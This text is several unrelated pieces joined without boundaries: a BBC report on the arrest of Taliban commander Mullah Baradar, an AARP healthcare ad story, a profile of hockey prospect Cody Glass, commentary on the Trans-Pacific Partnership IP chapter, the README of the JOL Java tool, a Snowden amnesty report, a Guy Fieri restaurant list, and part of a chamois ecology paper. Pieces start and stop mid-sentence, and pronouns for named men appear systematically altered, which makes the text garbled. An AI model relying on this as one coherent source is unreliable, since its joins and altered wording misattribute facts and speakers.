sources, said the prisoner was the most significant Taliban figure to be detained since the US-led war in Afghanistan began in 2001. But a Taliban spokesperson denied the reports, saying Mullah Baradar was still in Afghanistan actively organising the group's military and political activities. "He has not been captured. They want to spread this rumour just to divert the attention of people from their defeats in Marjah and confuse the public," Zabihullah Mujahid told Reuters news agency, referring to the US-led Nato offensive in the Marjah area of Helmand province. Guerrilla tactics Little is known about Mullah Baradar, but in terms of influence they are said to rank second only to the Taliban's spiritual leader, Mullar Muhammad Omar, who has been hiding from Western agencies since the 9/11 terror attacks in 2001. MULLAH BARADAR Second-in-charge behind Taliban founder Mullah Omar In charge of Taliban's military operations and financial affairs Born in Dehrawood district, Uruzgan province, in 1968 Former deputy defence minister for the Taliban regime Source: Interpol, news agencies
Profile: Mullah Baradar Is the arrest a breakthrough? NY Times explains news delay Senior intelligence officials voiced hope they would provide the location of Mullah Omar. The BBC's North America editor Mark Mardell, in Washington, says Mullah Baradar is a "big fish" who runs the Taliban's day-to-day operations, both military and financial. They allocate Taliban funds, appoints military commanders and designs military tactics, our correspondent says. Mullah Baradar was quoted last year as telling their troops not to confront US soldiers with their superior firepower, but to adopt guerrilla tactics.  They are said to be responsible for the Taliban tactic of planting "flowers" - improvised explosive devices (IEDs) - along roadsides. Please turn on JavaScript. Media requires JavaScript to play. The New York Times, citing officials, said the Karachi raid was conducted by Pakistan's Directorate for Inter-Services Intelligence (ISI) and CIA operatives. The newspaper said it had learned of the operation on Thursday, but delayed reporting it after a request by White House officials. They said disclosing it would end a very successful intelligence drive. US officials later acknowledged the news, saying it was becoming broadly known in the region. According to Interpol, Mullah Baradar was born in 1968 and served as deputy minister of defence for the Taliban regime in Afghanistan before it was toppled in 2001. They have been subject to UN sanctions including a travel ban, an arms embargo and the freezing of assets. Mullah Baradar was reported to have engaged in an e-mail exchange with Newsweek magazine in July 2009, in which they vowed to "inflict maximum losses" on US forces in Afghanistan. "In every nook and corner of the country, a spirit for jihad is raging," the magazine quoted them as saying.
Bookmark with: Delicious
Digg
reddit
Facebook
StumbleUpon What are these? E-mail this to a friend Printable version
The AARP has launched a seven-figure TV ad buy pressuring five Republican senators to oppose the House's healthcare bill.
The powerful lobbying group for seniors is targeting GOP Sens. Jeff Flake Jeffrey (Jeff) Lane FlakeBrexit and exit: A transatlantic comparison Poll: 33% of Kentucky voters approve of McConnell Trump suggests Heller lost reelection bid because they were 'hostile' during 2016 presidential campaign MORE (Ariz.), Cory Gardner Cory Scott GardnerJon Stewart, 9/11 responders call on Congress to fund victim compensation program The Hill's Morning Report — Emergency declaration to test GOP loyalty to Trump Don't look for House GOP to defy Trump on border wall MORE (Colo.), Dean Heller Dean Arthur HellerTrump suggests Heller lost reelection bid because they were 'hostile' during 2016 presidential campaign Trump picks ex-oil lobbyist David Bernhardt for Interior secretary Oregon Dem top recipient of 2018 marijuana industry money, study finds MORE (Nev.), Lisa Murkowski Lisa Ann MurkowskiHouse to push back at Trump on border GOP Sen. Tillis to vote for resolution blocking Trump's emergency declaration Pence meeting with Senate GOP ahead of vote to block emergency declaration MORE (Alaska) and Dan Sullivan (Alaska).
The group, which consists of nearly 38 million members, has been vocal in its opposition to the House GOP healthcare bill, the American Health Care Act, saying the bill would make coverage more expensive and unaffordable for older people.
ADVERTISEMENT
For instance, the bill lets insurers charge older adults five times more than younger people, while ObamaCare restricted carriers to only charging older adults three times more. AARP has blasted that provision as an “age tax.”
Additionally, the group says the bill weakens protections for those with pre-existing conditions and Medicare.
“Older Americans are very worried about the cost of their health insurance,” Nancy LeaMond, AARP executive vice president, said in a statement. “AARP is taking a strong stand against the American Health Care Act for one simple reason: it is a bad bill."
The ad buy comes as Republican senators are working to craft an ObamaCare repeal-and-replace bill that can get through the upper chamber after the House narrowly passed its legislation earlier this month.
A reconciliation bill — to fast-track budget maneuver the GOP is using to avoid a Democratic filibuster — only needs 51 votes to pass. However, Republicans in the Senate have a slim 52-48 majority and have vowed major changes on the House legislation.
WINNIPEG — On the surface, this is a story about a young hockey player who is about to fulfil their dream of getting drafted into the NHL.
Deep down, it's a story about a father's love, dedication and perseverance. It's about two sons, who showed the same qualities through hard times. It's about the reward for this unlikely trio — the postal worker, the aspiring doctor and the probable NHL first-round draft pick.
Cody Glass, an 18-year-old star with the Portland Winterhawks of the Western Hockey League, is ranked among the top-10 prospects for the June 23-24 NHL draft in Chicago. But you can't talk about Cody Glass without mentioning their father, Jeff, and their older brother Matthew.
“They're a team,” says Cody's uncle David Glass, calling them a support network for one another, in good times and bad.
“They're very tight. It's a them-against-the-world attitude with those three.”
They'll be together to experience some joy later this month, with Cody expected to be picked early in the first round at the United Centre.
“I can't wait to see their faces when I get drafted,” Cody says. “I just want to show there's a payoff to all the hard work and all the stuff they've dedicated to me. It's just a little thing I can do to pay them back.”
***
Jeff Glass must be doing something right with Matthew and Cody.
Matthew, 21, is a top student at the University of Winnipeg, who will write their Medical College Admission Test this summer and hopes to work toward becoming a doctor at the University of Manitoba.
Cody led the Winterhawks in scoring this season with 32 goals and 94 points in 69 games. The centre's efforts have them ranked sixth among North American prospects for the NHL draft, their 200-foot game drawing the most attention from the scouts.
But it hasn't been easy for anyone in the Glass family. Jeff has been raising the boys on their own in West Kildonan since they and their wife divorced in 2010.
Well, not entirely on their own. Until last year, Jeff and the boys lived with their mother, Judy.
“My mom supported us a lot, helped us through it all,” Jeff says. “Me and my boys moved in with my mom after my dad passed away so we could help them out, too. We helped each other out. They helped me keep the kids in hockey.
“It was tough, especially with Cody playing the highest level. It was tough trying to keep up with the registration and all that.”
Judy passed away last August.
Cody was trying out for Team Canada, hoping to play in the Ivan Hlinka tournament in the Czech Republic last summer, and their grandmother went into the hospital when they were away. Cody was devastated when they were cut from the team, but it gave them a chance to come home and say goodbye.
“So, in a way, it was a blessing that they got cut because they were home when they passed,” Jeff says. “If they had been at Ivan Hlinka, they would not have been here.”
Getting cut from the Ivan Hlinka team was not a sign of things to come for Cody.
Since that time, he's done nothing but blow away scouts, who are impressed with their hockey IQ, soft hands, great vision and excellent puck skills. They rose to sixth in the final NHL Central Scouting Bureau rankings from eighth at mid-term and has been ranked as high as third by some prognosticators.
“If you had said that last summer with everything that happened …” David says. “To be mentioned in the top-five now is just unbelievable.”
Wherever Cody goes, the team selecting them will be getting a man of character.
“He doesn't get handed a lot,” Jeff says. “I can only put them into certain camps that I can afford. For them to accomplish what he's accomplished on the means that we had for him, it means a lot and it shows how much they really wanted it.
“It'll probably be the proudest day of my life, seeing what he's accomplished.”
Cody remembers their dad taking them to the outdoor rink at the age of three and teaching them how to skate. They recall how their dad had to push them a bit to get them started in hockey at age four, even though it didn't seem to be their thing.
“There were times when I was scared of going on the ice and I would cry a couple of times, but crying made me learn how to love it,” Cody says. “I'm really thankful for my dad pushing me that hard, because hockey now is my life and it's something I love doing every day.”
Jeff remembers all of that differently. They credit Matthew, three years older than Cody, with being the driving force.
“He always wanted to go with their brother to the rink, so that got them more into it,” Jeff says. “He wanted to learn and they wanted to catch up to their brother, so I think that helped a lot.”
***
Matthew played hockey until they were 18, but quit after suffering a concussion. They turned their attention to their studies and racked up a 4.0 grade point average as an undergraduate at the University of Winnipeg.
Jeff says the brothers were always tight, but “with the separation, divorce, it made those two guys even closer … They're not like regular brothers. I have two brothers and we fought all the time. These guys are totally different. I've never seen them have a fight like I've had with my brothers.”
“They're fantastic kids,” adds David, who works as a nurse anesthetist in Florida. “They're protective of each other and Cody's very protective of their dad, which is good, because they've been through a lot.”
As much as their dad and brother deserve some credit for the player Cody has become, they have to get most of the credit himself.
“He's done it all on their own,” Jeff says. “He's got talent, but I think they have pushed themselves as hard as anybody can push themselves to want something.
“You're trying to keep up with everybody. They keep going into all these camps and you think your kid will fall behind if they don't go in it. We picked one camp during the summer time and I'd usually talk to Cody about what they wanted to do — whether it was work on skating or shooting or whatever.
“He had their mind set years ago that they were going to be an NHL player. I never said, ‘you're not going to be able to do it.' I just said it's going to take a lot of work to get there, and they put their heart to it, so I'm just happy to see how they pushed himself.”
If that work ethic sounds familiar to Winnipeg hockey fans, it should.
For years, Cody has seen Winnipeg Jets centre Mark Scheifele as a player to emulate both on and off the ice. Scheifele was a lanky 175-pound kid when they were first drafted by the Jets in 2011 but has grown into a dominant 6-foot-3, 207-pound centre.
Scheifele, who had 32 goals and 82 points in 2016-17, gives much of the credit to their off-season training regimen with hockey fitness guru Gary Roberts.
“You can tell with Mark Scheifele that they just works so hard and is so dedicated to hockey,” says Cody, who is 6-foot-2, 180 pounds. “He's a great hockey player and someone who I look up to in the NHL.”
Cody has been with NRG Athletes in Winnipeg for the last four years, and believes their off-season work has been the difference in making them an elite NHL prospect.
“I've wanted to be one of the best players at my age, and I've just pushed myself every day at the gym and on the ice, too,” Cody says. “My work ethic and my compete level have always been with me since I was younger, and that really shows now.
“What you do in the off-season obviously shows during the season. Most players, you can tell if they didn't train that hard in the off-season. Most players who have a good start to the year, you can tell they did have a good summer.”
April Rogers, who is Matthew's godmother, says the work ethic can be traced back to Jeff.
“He's a pretty determined fellow,” they say. “Does this man ever stop giving?”
Jeff played hockey themselves until they were about 13, then focused on soccer, playing until they were 42 in the Manitoba Major Soccer League's premier division.
They coached both of their boys in soccer and did what they could to keep Cody playing hockey at the highest level.
“People knew that I was having a tough time, but I wouldn't take money from friends,” Jeff says. “I just didn't feel right doing that. I had a couple of friends who offered, but I just didn't ever want to get to that point.”
They don't see themselves as the hero in all this, anyway.
“I have two amazing kids,” they say. “They'd do anything. If I couldn't afford something, they wouldn't cry. They understood. They were very supportive, as well, and I couldn't be happier with them.”
***
Cody's dad and brother, their girlfriend, their billets from Portland, and about 20 other family members and friends will be on hand at the NHL draft.
They'll be there to support a player who has grown under the coaching of Mike Johnston in Portland.
“They had a lot of faith in my ability to play hockey,” Cody says of the Winterhawks. “I've always been proud of getting drafted in the first round (of the WHL draft) by Portland, and the year I had this year, they were a huge part of it. They are such a great organization and I can't thank them enough.”
Cody says Johnston taught them to play a two-way game, to use their offensive talent without sacrificing the defensive responsibilities.
“I really take pride in that, and it's something to really take into the next level,” Cody says. “One thing I'm a little bit better at is being offensive-minded and just slowing the game down.”
It's going to be an emotional moment for the Glass family when Cody's name gets called. They've just been through so much together.
It would be fitting if they could all go up on stage.
“Ever since I was a little kid, I have always dreamed of this moment, so now that it's getting closer every day, it's just amazing,” Cody says. “It's a once-in-lifetime opportunity knowing that I'm going to get a chance to walk up on stage and knowing that I'm so close to having that day come true.
“It's something we've all been looking forward to our whole lives.”
Trade Minister Andrew Robb has responded to last week's leak of the intellectual property chapter negotiations of the Trans-Pacific Partnership, arguing Australia won't agree to anything that would “force Australian consumers to pay more for subsidised drugs or imposes tougher penalties on internet providers”.
But if the document is accurate, it looks like Australia wants others to adopt an IP chapter that is highly prescriptive, and which would lock Australian IP law to an inflexible, and in many cases outdated and harmful set of rules.
Organisations including Knowledge Ecology International, Public Citizen, Program on Information Justice and Intellectual Property (PIJIP) and Medicins Sans Frontieres have all commented on the leaked text. All are warning that the text involves dangers for access to medicines, the internet, and IP law generally.
Devil in the detail
Is the draft as bad as the critics have been saying? Yes. Not every claim you will read about the text is 100% accurate. It is not true, for example, that Australia is opposing limits on intermediary liability (although the option we support to limit ISP liability is horribly complex, limited and inflexible compared to alternatives on the table). But if everything Australia seems to be supporting in this leak goes through, it will be bad for Australian interests, and if some of what Australia opposes gets through, it could be disastrous.
The leak is particularly interesting because it reveals individual country negotiating positions - and it seems that Australia is playing a complex role, but one which, in my view, is ultimately not well thought through.
On patent law, Australia's role seems to be (mostly) benign, though there's plenty to fear in the US-proposed text. The US is alone in trying to ram through extraordinary new rights for pharmaceutical patent holders (broader patentability including for new drug formulations with no proven improved efficacy, extended patent terms, extended monopolies on clinical data, links between the processes of the TGA and patent litigation).
These extra protections would, if the analysis of our recent Pharmaceutical Patents Review Draft Report is right, inevitably increase Australia's drug bill (and, worst case scenario, perhaps cause Australia to cut back on the drugs available to Australians under subsidy to control ballooning costs). Here, other countries have proposed a much less protective, and more flexible approach. We should hope that they prevail, and it would have been nice to see Australia recorded as supporting more of the flexible provisions in this text.
On copyright, however, Australia's role is much less benign, at least from a user perspective. Australia is supporting very extensive criminalisation of copyright infringement: under the Australian position, even a single copyright infringement that leads to indirect financial gain is a criminal act. So the publisher who had to junk copies of a Schapelle Corby book because it had some copyright infringing photos in it, or the pub that is a bit late paying its APRA licence fees, would both be deemed criminals. But it could be worse. If the US gets its way, copying a friend's CD or photocopying too much of a textbook you can't afford to buy would probably become criminal acts.
On anti-circumvention rules (rules about hacking technical measures copyright owners used to control access/copying of content), Australia seems to be supporting text that matches the Australia-US Free Trade Agreement. Including the bit that was described by a Parliamentary Committee with members from both sides of politics as a “lamentable and inexcusable flaw”. Say goodbye to any sensible way to deal with issues around geo-locked content and the “Australia tax”.
On intermediary liability, Australia wants to lock in a model originally written in the US back in 1997, rather than adopt more forward-looking, flexible options put on the table by other parties.
On IP enforcement, there are a few nasties that may be hidden in some of the details of the text, including in-transit border seizures that could impact access to medicines. Australia doesn't support everything here, but the proposals do include treble damages for patent infringement; seizure of anything and everything used to infringe copyright (say goodbye to your laptop or your cloud server), and more. The IP enforcement provisions include few safeguards for civil liberties or due process, and no requirement that I could find that remedies in infringement be proportional to the seriousness of the infringement or avoid harming innocent third parties.
Long-term impact
But the main evils of the text do not just lie in specific details. The negotiators could still fix specific issues, and some, but by no means all of the positions Australia has taken here could improve the text and make it less wholly unbalanced. No doubt following all the commentary of the last few days, more changes will be made.
The real problem is the fact that there is so much detail. Remember, this is a trade agreement, and it might even be a framework for a broader regional deal. It likely won't change for decades. Even assuming these rules are sensible now (which is up for debate), will they still seem sensible in 20 years? Not likely.
And the leak we've seen is just one of over 20 chapters. The others could contain detail equally bad. But we don't know. According to the negotiators, we don't need to know because they're “consulting widely”. In light of what we see in the IP draft, however, this “trust us” mantra is wearing very thin indeed.
This is the fourth piece in our series on the Trans-Pacific Partnership.
Read the other pieces:
When trade agreements threaten sovereignty: Australia beware
Multilateral, regional, bilateral: which agreement is best
The Trans-Pacific Partnership and Australia's right to know
Trade pact would make internet services more expensive
Code Tools: jol
JOL (Java Object Layout) is the tiny toolbox to analyze object layout schemes in JVMs. These tools are using Unsafe, JVMTI, and Serviceability Agent (SA) heavily to decoder the actual object layout, footprint, and references. This makes JOL much more accurate than other tools relying on heap dumps, specification assumptions, etc.
Building JOL from source
Check out the JOL source with Mercurial: $ hg clone http://hg.openjdk.java.net/code-tools/jol/ jol Build JOL with Maven: $ cd jol/ $ mvn clean install You only need to do this step once, and Maven will deploy JOL into your local repo. If you have the Maven repository manager installed, it might be a good idea to deploy the artifact there. If not, you can just go with the local build.
You may skip this step and use the published binaries instead, see the usage below. It is generally preferred to use the latest source version, that hopefully has the most issues fixed. Follow these steps to compile JOL from the source.
There are two major ways to use this project.
Use as Library Dependency
<dependency> <groupId>org.openjdk.jol</groupId> <artifactId>jol-core</artifactId> <version>put-the-version-here</version> </dependency>
OpenJDK Community semi-regularly pushes the releases to Maven Central . Therefore, you can use it right away by setting up the Maven dependency:
It is a good idea to review JOL Samples and CLI tools source before using the tool at its full capacity as the library.
Use as Command Line Tool
Build produces the self-contained executable JAR in jol-cli/target/jol-cli.jar . Published Maven artifacts also include the executable JAR that one can download and start using right away. To do that, look for the latest version of jol-cli-$version-full.jar here.
Run it with help argument to get the list of operations it has. The brief list of operations we have goes below:
Get the object internals, that is, the field layout within the object, header information, field values, the data on alignment losses. $ java -jar jol-cli/target/jol-cli.jar internals java.util.HashMap Running 64-bit HotSpot VM. Using compressed oop with 3-bit shift. Using compressed klass with 3-bit shift. Objects are 8 bytes aligned. Field sizes by type: 4, 1, 1, 2, 2, 4, 4, 8, 8 [bytes] Array element sizes: 4, 1, 1, 2, 2, 4, 4, 8, 8 [bytes] java.util.HashMap object internals: OFFSET SIZE TYPE DESCRIPTION VALUE 0 4 (object header) 05 00 00 00 (0000 0101 0000 0000 0000 0000 0000 0000) 4 4 (object header) 00 00 00 00 (0000 0000 0000 0000 0000 0000 0000 0000) 8 4 (object header) 8c 3b 00 f8 (1000 1100 0011 1011 0000 0000 1111 1000) 12 4 Set AbstractMap.keySet null 16 4 Collection AbstractMap.values null 20 4 int HashMap.size 0 24 4 int HashMap.modCount 0 28 4 int HashMap.threshold 0 32 4 float HashMap.loadFactor 0.75 36 4 Node[] HashMap.table null 40 4 Set HashMap.entrySet null 44 4 (loss due to the next object alignment) Instance size: 48 bytes (reported by Instrumentation API) Space losses: 0 bytes internal + 4 bytes external = 4 bytes total
Get the object externals, that is, the objects reachable from the instance, their addresses, paths through the reachability graphs, etc (is is more convenient with API though): $ java -jar jol-cli/target/jol-cli.jar externals java.util.PriorityQueue Running 64-bit HotSpot VM. Using compressed oop with 3-bit shift. Using compressed klass with 3-bit shift. Objects are 8 bytes aligned. Field sizes by type: 4, 1, 1, 2, 2, 4, 4, 8, 8 [bytes] Array element sizes: 4, 1, 1, 2, 2, 4, 4, 8, 8 [bytes] java.util.PriorityQueue object externals: ADDRESS SIZE TYPE PATH VALUE 719231ad0 32 java.util.PriorityQueue (object) 719231af0 64 [Ljava.lang.Object; .queue [null, null, null, null, null, null, null, null, null, null, null]
Get the object footprint estimate, same as the object externals, but tabulated: $ java -jar jol-cli/target/jol-cli.jar footprint java.util.Hashtable Running 64-bit HotSpot VM. Using compressed oop with 3-bit shift. Using compressed klass with 3-bit shift. Objects are 8 bytes aligned. Field sizes by type: 4, 1, 1, 2, 2, 4, 4, 8, 8 [bytes] Array element sizes: 4, 1, 1, 2, 2, 4, 4, 8, 8 [bytes] java.util.Hashtable instance footprint: COUNT AVG SUM DESCRIPTION 1 64 64 [Ljava.util.Hashtable$Entry; 1 48 48 java.util.Hashtable 2 112 (total)
Get the estimated object layout in different VM modes (EXPERIMENTAL): $ java -jar jol-cli/target/jol-cli.jar estimates java.math.BigInteger java.math.BigInteger object internals: OFFSET SIZE TYPE DESCRIPTION VALUE 0 8 (object header) N/A 8 4 int BigInteger.signum N/A 12 4 int[] BigInteger.mag N/A 16 4 int BigInteger.bitCount N/A 20 4 int BigInteger.bitLength N/A 24 4 int BigInteger.lowestSetBit N/A 28 4 int BigInteger.firstNonzeroIntNum N/A Instance size: 32 bytes (estimated, the sample instance is not available) Space losses: 0 bytes internal + 0 bytes external = 0 bytes total ***** 64-bit VM: ********************************************************** java.math.BigInteger object internals: OFFSET SIZE TYPE DESCRIPTION VALUE 0 16 (object header) N/A 16 8 int[] BigInteger.mag N/A 24 4 int BigInteger.signum N/A 28 4 int BigInteger.bitCount N/A 32 4 int BigInteger.bitLength N/A 36 4 int BigInteger.lowestSetBit N/A 40 4 int BigInteger.firstNonzeroIntNum N/A 44 4 (loss due to the next object alignment) Instance size: 48 bytes (estimated, the sample instance is not available) Space losses: 0 bytes internal + 4 bytes external = 4 bytes total ***** 64-bit VM, compressed references enabled: *************************** java.math.BigInteger object internals: OFFSET SIZE TYPE DESCRIPTION VALUE 0 12 (object header) N/A 12 4 int BigInteger.signum N/A 16 4 int[] BigInteger.mag N/A 20 4 int BigInteger.bitCount N/A 24 4 int BigInteger.bitLength N/A 28 4 int BigInteger.lowestSetBit N/A 32 4 int BigInteger.firstNonzeroIntNum N/A 36 4 (loss due to the next object alignment) Instance size: 40 bytes (estimated, the sample instance is not available) Space losses: 0 bytes internal + 4 bytes external = 4 bytes total ***** 64-bit VM, compressed references enabled, 16-byte align: ************ java.math.BigInteger object internals: OFFSET SIZE TYPE DESCRIPTION VALUE 0 12 (object header) N/A 12 4 int BigInteger.signum N/A 16 4 int[] BigInteger.mag N/A 20 4 int BigInteger.bitCount N/A 24 4 int BigInteger.bitLength N/A 28 4 int BigInteger.lowestSetBit N/A 32 4 int BigInteger.firstNonzeroIntNum N/A 36 12 (loss due to the next object alignment) Instance size: 48 bytes (estimated, the sample instance is not available) Space losses: 0 bytes internal + 12 bytes external = 12 bytes total
Consume the heap dump and figure the perceived footprint in different VM modes (EXPERIMENTAL): $ java -jar jol-cli/target/jol-cli.jar heapdump heapdump.hprof Heap Dump: heapdump.hprof Estimated heap consumed, bytes: 173,564,985: Raw data (X32 model) 179,480,339: VM Layout Simulation (X32 model) -0.000% 179,480,067: VM Layout Simulation (X32 model, hierarchy gaps) -0.000% 179,480,043: VM Layout Simulation (X32 model, super gaps) -2.692% 174,649,167: VM Layout Simulation (X32 model, autoalign) -2.693% 174,647,815: VM Layout Simulation (X32 model, hierarchy gaps, autoalign) -2.693% 174,647,803: VM Layout Simulation (X32 model, super gaps, autoalign) 232,120,233: Raw data (X64 model) 237,629,451: VM Layout Simulation (X64 model) -0.000% 237,629,155: VM Layout Simulation (X64 model, hierarchy gaps) -0.001% 237,626,779: VM Layout Simulation (X64 model, super gaps) -0.059% 237,488,735: VM Layout Simulation (X64 model, autoalign) -0.059% 237,488,439: VM Layout Simulation (X64 model, hierarchy gaps, autoalign) -0.060% 237,486,063: VM Layout Simulation (X64 model, super gaps, autoalign) 190,397,793: Raw data (X64 model (compressed oops)) 199,205,031: VM Layout Simulation (X64 model (compressed oops)) -0.001% 199,202,303: VM Layout Simulation (X64 model (compressed oops), hierarchy gaps) -0.014% 199,177,791: VM Layout Simulation (X64 model (compressed oops), super gaps) -3.845% 191,544,859: VM Layout Simulation (X64 model (compressed oops), autoalign) -3.846% 191,543,211: VM Layout Simulation (X64 model (compressed oops), hierarchy gaps, autoalign) -3.859% 191,518,687: VM Layout Simulation (X64 model (compressed oops), super gaps, autoalign)
Links
FILE - This Sept. 19, 2007 file photo shows the National Security Agency building at Fort Meade, Md. The National Security Agency has been extensively involved in the U.S. government's targeted killing program, collaborating closely with the CIA in the use of drone strikes against terrorists abroad, The Washington Post reported Wednesday Oct. 16, 2013 after a review of documents provided by former NSA systems analyst Edward Snowden. (AP Photo/Charles Dharapak, File) In the firing line ... National Security Agency (NSA) Director Gen. Keith Alexander testifies on Capitol Hill in Washington to answer concerns raised by leaked documents from whistleblower Edward Snowden . (AP Photo/Manuel Balce Ceneta)
A US National Security Agency official has said in an interview they would be open to cutting an amnesty deal with US intelligence leaker Edward Snowden if the fugitive agreed to stop divulging secret documents.
But the agency head has disagreed.
Rick Ledgett, who heads the NSA's task force investigating the damage from the Snowden leaks, told CBS television's 60 Minutes program that some but not all of their colleagues share their view.
Read Next
"My personal view is, yes, it's worth having a conversation about" a possible deal, said Mr Ledgett, according to excerpts of the interview due to air tomorrow.
But Mr Snowden would have to provide firm assurances that the remaining documents would be secured.
"My bar for those assurances would be very high . . . more than just an assertion on their part," Mr Ledgett said.
Mr Snowden, a former intelligence contractor for the NSA, has been charged with espionage by US authorities for divulging reams of secret files.
They have secured asylum in Russia and insisted they spilled secrets to spark public debate and expose the NSA's far-reaching surveillance.
But NSA chief General Keith Alexander rejects the idea of any amnesty for Mr Snowden.
"This is analogous to a hostage-taker taking 50 people hostage, shooting 10 and then say, 'You give me full amnesty and I'll let the other 40 go,"' General Alexander told 60 Minutes.
General Alexander said an amnesty deal would set a dangerous precedent for any future leakers.
The four-star general, who is due to retire next year, also said they offered their resignation after the leak but that it was not accepted by President Barack Obama's administration.
Mr Snowden reportedly stole 1.7 million classified documents and Mr Ledgett said they "wouldn't dispute" that figure.
About 58,000 of the documents taken by Mr Snowden have been passed to news media outlets, according to the editor of Britain's The Guardian newspaper.
Guy Fieri is no stranger to Virginia Beach restaurants. Fieri's hit show “Diners, Drive-Ins & Dives” had them travelling the country in search for only the best of the best in culinary talents. When Guy Fieri made their way to Virginia, they chewed through 16 restaurants… six of which were Virginia Beach restaurants!
So, which VA Beach restaurants made Guy Fieri's list?
Leaping Lizard Cafe
Location: 4408 Shore Dr. Virginia Beach, VA 23455
Leaping Lizard Cafe Menu
Leaping Lizards Cafe in VB was one of the six in the city that made the list. Leaping Lizards Cafe serves traditional American cuisine. Their friendly service and delicious meals were what Guy liked about this cozy diner. The ingredients used at this restaurant are super fresh, as they are sourced right here locally. When dining at this secluded restaurant, we recommend you take advantage of their outdoor patio when the weather is right.
Guy Fieri recommends ordering:
Homemade Chicken Salad Sandwich
Beef Tenderloin
Whitner's Barbecue
Location: 869 Lynnhaven Parkway Virginia Beach, VA 23452
Whitners Menu
Whitner's Barbecue knows good cooking! The owner was raised with it in mind. That's definitely why Whitner's BBQ made the list. Mr. Rogers, the owner of Whitner's BBQ, has always had a passion for cooking the best ‘cue around, and they have succeeded and is now sharing it with the world.
Guy Fieri recommends ordering:
Mr. Whitner's Smoked Turkey Sandwich
KC Burnt Ends
Flip Flop Grill & Chill
Location: 2217 Upton Dr. #814, Virginia Beach, VA 23454
Flip Flops Grill Menu
This VA Beach restaurant is so easy to enjoy because it really gives off the vibe of chilling, relaxing, and knowing you're in for a really tasty meal. Guy Fieri suggests getting a drink here. As a personal favorite, Fieri liked the Fish Tacos. They have great flavor, and it's even better that the Fish Tacos at Flip Flops Grill are always fresh.
Guy Fieri recommends ordering:
Fish Tacos
Sweet Potato Fries
Citrus Breakfast & Lunch
Location: 2265 W. Great Neck Rd. Virginia Beach, VA 23451
Citrus Menu
Citrus is THE place to come for breakfast and lunch while in VB. As the name of this restaurant suggests, they do have many menu items that have a citrus twist. The stack of pancakes you can order at Citrus will blow you away! The Citrus-Glazed Pancakes that were ordered by Diners, Drive-Ins, and Dives were topped with Pineapples, Bananas and fresh Nutmeg.
Guy Fieri recommends ordering:
Citrus-Glazed Pancakes
Beach Pub
Location: 1001 Laskin Rd. Virginia Beach, VA 23451
Beach Pub Menu
Beach Pub is guaranteed the best pub food you'll ever have! What's recommended by Diners, Drive-Ins & Dives for an appetizer, don't forget to order the Oysters Rockefeller. This is one of the ultimate favorites in all of VA Beach! You won't want to leave VB without trying Oysters Rockefeller if you are a fan of oysters.
Guy Fieri recommends ordering:
Fish Hash
Oysters Rockefeller
Rigoletto Italian Bakery and Cafe
Location: 2181 Upton Dr #414, Virginia Beach, VA 23454
Rigoletto Italian Menu
Rigoletto Italian Bakery and Cafe was featured on the episode called ‘Global Comfort' on Season 12 of Diners, Drive-Ins & Dives. This VB restaurant has a ton of sweets and entrees too! Rigoletto's is a mother-daughter business that serves authentic Italian cuisine. Their bakery items are made daily to ensure they are fresh and exactly how they should taste!
Guy Fieri recommends ordering:
Cannolis
Eclairs
Stuffed Meatballs
While this next restaurant is not located in Virginia Beach, it is a neighboring city and is important to note that it made the list!
Doumar's Cones and BBQ
Location: 1919 Monticello Ave. Norfolk, VA 23517
Doumars Menu
Opened in 1904, Doumars in Norfolk, VA and has been enjoyed by many to this day. Why Doumar's is so famous is because this is the first place that the waffle cone met ice cream. Abe Doumar created the beloved combo of the ice cream cone.
Guy Fieri recommends ordering:
Pronounced long-term body mass declines were identified in all three populations. Models of juvenile body mass performed well in explaining these declines (Figure 4). However, the poor performances of residual models show that deviations from the general trends (i.e. years in which juveniles are particularly heavy or particularly light relative to the trend) cannot be explained as accurately. Mass declines appear to be linked most strongly to increases in growing season temperatures and population density; temperature and/or density have the strongest negative effects on body mass and deviations from yearly trend in all sites (Table 1, Figure 5). In comparison, there is no evidence of a strong negative effect of vegetation productivity or phenology on body mass, suggesting that body mass declines were not mediated by vegetation change as indexed by NDVI. Our results provide an interesting contrast to the majority of studies to date, which have implicated changes in food availability and quality as the most likely cause of body size declines [7].
Growing season temperature appears to be strongly linked to mass declines in all three populations (Table 1, Figures 5 and 6). However, despite significant temperature change (Figure 2a), there has been no consistent change in either vegetation productivity or phenology (Figure 3). Furthermore, there is no relationship between temperature and any NDVI metric. As such, we find no evidence for our first putative driver of mass change: that climate change has affected body mass via effects on resource productivity or phenology. Instead, our results provide support for our second putative driver: that climate change could be directly affecting chamois behaviour or physiology, limiting their ability to acquire resources. In another alpine ungulate, the ibex (Capra ibex), temperatures above 15-20°C result in heat discomfort in males, reducing the time they can spend foraging [31]. In ungulates, behavioural changes, such as allocating less time to foraging, play an important role in thermoregulation because they can be more energetically efficient than autonomic thermoregulation [60],[61]. Higher daily temperatures during spring and summer may have led to juvenile chamois spending more time resting and less time foraging than in the past, reducing their ability to store energy reserves and invest in growth. Indeed, chamois, like many ungulates, reduce their feeding activity during the hottest period of the day [62]. Furthermore, chamois spend less time foraging when it is hotter, independent of time of day [63]. Our results suggest that temperature affects the ability of juveniles to acquire resources themselves rather than via lagged effects on their mothers (Figure 5). It is possible that juvenile ungulates are more susceptible to higher temperatures due to having higher relative metabolic demands than adults [64],[65]. Whilst we did not find any evidence for sex-specific environmental effects on body mass, that mass declines in juvenile males are consistently more pronounced than in females (Figure 1) suggests that, even in a relatively monomorphic ungulate species, a more energetically demanding growth phase could make males more susceptible to environmental stressors [20].
Population density also appears to be strongly linked to mass declines in juvenile chamois, providing support for our third putative driver: that changes in density affect per-capita resource availability (Table 1, Figures 5 and 6). The study populations have grown substantially following the implementation of stricter controls on hunting. As a result, increased intra-specific competition for resources may have led to reduced rates of per-capita food intake. Additionally, climate change may have affected chamois survival or fecundity, contributing to this population growth. Density dependence in body mass has been detected in a range of ungulate species (e.g. [27],[36],[66]) and even specifically in juvenile chamois [52]. At high latitudes and in alpine regions, this effect is most likely to manifest during winter, when snow cover reduces forage availability and increases forage patchiness, resulting in higher levels of agonistic interactions among individuals [67],[68]. It is also possible that density dependence could be mediated by overgrazing; however, no changes in NDVI consistent with overgrazing, such as decreases in maximum NDVI or INDVI [69], were detected. Overgrazing can also encourage the colonisation of grazing-tolerant, less palatable species [70], which might not result in detectable changes in productivity. However, such changes would not alter our finding that increases in density appear to have influenced body mass via changes in per-capita resource availability. As with temperature, the effect of density in the year of shooting appears most important (Figure 5), suggesting that competition for forage following weaning, rather than a lagged influence of competition on mothers in the previous year, has a stronger influence on juvenile mass. Indeed, intra-specific competition for resources is most likely to result in the displacement of subordinate individuals, such as juveniles, from food patches 